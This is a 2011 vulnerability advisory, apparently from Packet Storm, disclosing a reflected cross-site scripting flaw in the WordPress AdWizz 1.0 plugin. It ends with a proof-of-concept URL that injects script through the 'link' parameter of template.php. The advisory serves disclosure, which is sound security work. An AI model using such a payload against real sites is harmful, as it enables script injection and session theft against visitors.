WordPress AdWizz 1.0 Cross Site Scripting

2011-04-04T00:00:00
ID PACKETSTORM:100049
Type packetstorm
Reporter AutoSec Tools
Modified 2011-04-04T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WordPress AdWizz 1.0  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://wordpress.org/extend/plugins/ad-wizz/  
Discovery Date..........4/3/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in WordPress AdWizz 1.0  
can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{//  
`